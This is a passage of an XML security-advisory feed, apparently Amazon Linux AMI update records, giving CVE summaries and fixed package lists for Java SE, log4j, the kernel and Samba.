Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2021-35578:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2021-35567:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows low privileged attacker with network access via Kerberos to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 6.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N).
CVE-2021-35565:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2021-35564:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Keytool). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2021-35561:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Utility). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2021-35559:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2021-35556:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2021-35550:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35550" title="" id="CVE-2021-35550" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35556" title="" id="CVE-2021-35556" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35559" title="" id="CVE-2021-35559" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35561" title="" id="CVE-2021-35561" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35564" title="" id="CVE-2021-35564" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35565" title="" id="CVE-2021-35565" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35567" title="" id="CVE-2021-35567" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35578" title="" id="CVE-2021-35578" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35586" title="" id="CVE-2021-35586" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35588" title="" id="CVE-2021-35588" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35603" title="" id="CVE-2021-35603" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-devel" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.312.b07-0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.312.b07-0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.312.b07-0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.312.b07-0.65.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.312.b07-0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.312.b07-0.65.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.312.b07-0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.312.b07-0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.312.b07-0.65.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.312.b07-0.65.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.312.b07-0.65.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.312.b07-0.65.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.312.b07-0.65.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.312.b07-0.65.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1562</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1562: important priority package update for log4j</title><issued date="2022-01-18 20:15:00" /><updated date="2023-02-17 00:02:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-4104:
A flaw was found in the Java logging library Apache Log4j in version 1.x . This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender. This flaw has been filed for Log4j 1.x, the corresponding flaw information for Log4j 2.x is available at: https://access.redhat.com/security/cve/CVE-2021-44228
CVE-2019-17571:
A flaw was discovered in Log4j, where a vulnerable SocketServer class may lead to the deserialization of untrusted data. This flaw allows an attacker to remotely execute arbitrary code when combined with a deserialization gadget.
CVE-2017-5645:
It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5645" title="" id="CVE-2017-5645" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17571" title="" id="CVE-2019-17571" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104" title="" id="CVE-2021-4104" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="log4j-manual" version="1.2.17" release="16.12.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-manual-1.2.17-16.12.amzn1.noarch.rpm</filename></package><package name="log4j" version="1.2.17" release="16.12.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-1.2.17-16.12.amzn1.noarch.rpm</filename></package><package name="log4j-javadoc" version="1.2.17" release="16.12.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-javadoc-1.2.17-16.12.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1563</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1563: important priority package update for kernel</title><issued date="2022-02-04 23:24:00" /><updated date="2025-01-30 04:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-0492:
The cgroup release_agent is called with call_usermodehelper. The function call_usermodehelper starts the release_agent with a full set of capabilities. Therefore require capabilities when setting the release_agent.
CVE-2021-47506:
In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix use-after-free due to delegation race
CVE-2021-47483:
In the Linux kernel, the following vulnerability has been resolved:
regmap: Fix possible double-free in regcache_rbtree_exit()
CVE-2021-4155:
A data leak flaw was found in the way XFS_IOC_ALLOCSP IOCTL in the XFS filesystem allowed for size increase of files with unaligned size. A local attacker could use this flaw to leak data on the XFS filesystem otherwise not accessible to them.
CVE-2021-4002:
A memory leak flaw in the Linux kernel's hugetlbfs memory usage was found in the way the user maps some regions of memory twice using shmget() which are aligned to PUD alignment with the fault of some of the memory pages. A local user could use this flaw to get unauthorized access to some data.
CVE-2021-3772:
A flaw was found in the Linux SCTP stack. A blind attacker may be able to kill an existing SCTP association through invalid chunks if the attacker knows the IP-addresses and port numbers being used and the attacker can send packets with spoofed IP addresses.
CVE-2021-28715:
Incoming data packets for a guest in the Linux kernel's netback driver are buffered until the guest is ready to process them. There are some measures taken for avoiding to pile up too much data, but those can be bypassed by the guest: There is a timeout how long the client side of an interface can stop consuming new packets before it is assumed to have stalled, but this timeout is rather long (60 seconds by default). Using a UDP connection on a fast interface can easily accumulate gigabytes of data in that time.
CVE-2021-28714:
Incoming data packets for a guest in the Linux kernel's netback driver are buffered until the guest is ready to process them. There are some measures taken for avoiding to pile up too much data, but those can be bypassed by the guest: The timeout could even never trigger if the guest manages to have only one free slot in its RX queue ring page and the next package would require more than one free slot, which may be the case when using GSO, XDP, or software hashing.
CVE-2021-28713:
A denial of service flaw for virtual machine guests in the Linux kernel's Xen hypervisor subsystem was found in the way users call some interrupts with high frequency from one of the guests.
A local user could use this flaw to starve the resources resulting in a denial of service.
CVE-2021-28712:
A denial of service flaw for virtual machine guests in the Linux kernel's Xen hypervisor subsystem was found in the way users call some interrupts with high frequency from one of the guests.
A local user could use this flaw to starve the resources resulting in a denial of service.
CVE-2021-28711:
A denial of service flaw for virtual machine guests in the Linux kernel's Xen hypervisor subsystem was found in the way users call some interrupts with high frequency from one of the guests.
A local user could use this flaw to starve the resources resulting in a denial of service.
CVE-2021-20322:
A flaw in the processing of received ICMP errors (ICMP fragment needed and ICMP redirect) in the Linux kernel functionality was found to allow the ability to quickly scan open UDP ports. This flaw allows an off-path remote user to effectively bypass the source port UDP randomization. The highest threat from this vulnerability is to confidentiality and possibly integrity, because software that relies on UDP source port randomization are indirectly affected as well.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20322" title="" id="CVE-2021-20322" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28711" title="" id="CVE-2021-28711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28712" title="" id="CVE-2021-28712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28713" title="" id="CVE-2021-28713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28714" title="" id="CVE-2021-28714" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28715" title="" id="CVE-2021-28715" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3772" title="" id="CVE-2021-3772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4002" title="" id="CVE-2021-4002" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4155" title="" id="CVE-2021-4155" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-47483" title="" id="CVE-2021-47483" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-47506" title="" id="CVE-2021-47506" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0492" title="" id="CVE-2022-0492" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.262-135.489.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1564</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1564: critical priority package update for samba</title><issued date="2022-02-10 21:59:00" /><updated date="2022-02-18 22:48:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-44142:
Out-of-bounds heap read/write vulnerability in VFS module vfs_fruit allows code execution
CVE-2021-20254:
A flaw was found in samba. The Samba smbd file server must map Windows group identities (SIDs) into unix group ids (gids). The code that performs this had a flaw that could allow it to read data beyond the end of the array in the case where a negative cache entry had been added to the mapping cache. This could cause the calling code to return those values into the process token that stores the group membership for a user. The highest threat from this vulnerability is to data confidentiality and integrity.
CVE-2020-25717:
A flaw was found in the way Samba maps domain users to local users. An authenticated attacker could use this flaw to cause possible privilege escalation.
CVE-2016-2124:
A flaw was found in the way samba implemented SMB1 authentication. An attacker could use this flaw to retrieve the plaintext password sent over the wire even if Kerberos authentication was required.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2124" title="" id="CVE-2016-2124" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25717" title="" id="CVE-2020-25717" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20254" title="" id="CVE-2021-20254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44142" title="" id="CVE-2021-44142" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.10.16" release="18.59.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.10.16-18.59.amzn1.noarch.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.10.16" release="18.59.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.10.16-18.59.amzn1.noarch.rpm</filename></package><package name="libwbclient" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="18.59.amzn1" epoch="0" 